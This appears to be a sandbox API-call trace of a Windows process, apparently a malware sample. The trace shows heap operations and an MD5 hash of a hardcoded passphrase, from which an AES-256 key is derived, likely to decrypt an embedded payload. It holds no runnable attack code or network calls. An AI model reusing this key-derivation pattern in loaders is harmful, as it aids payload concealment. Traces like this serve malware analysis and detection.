[0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.491] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.491] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0092.491] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0092.491] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0092.491] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0092.492] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.492] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.492] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.492] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.492] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0092.493] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.493] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.493] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0092.493] CryptHashData (hHash=0x41ac140, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0092.493] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.493] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0092.493] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0092.493] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0092.494] CryptDestroyHash (hHash=0x41ac140) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0092.494] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0092.495] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0092.495] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.496] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0092.497] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0092.498] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0092.498] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.498] 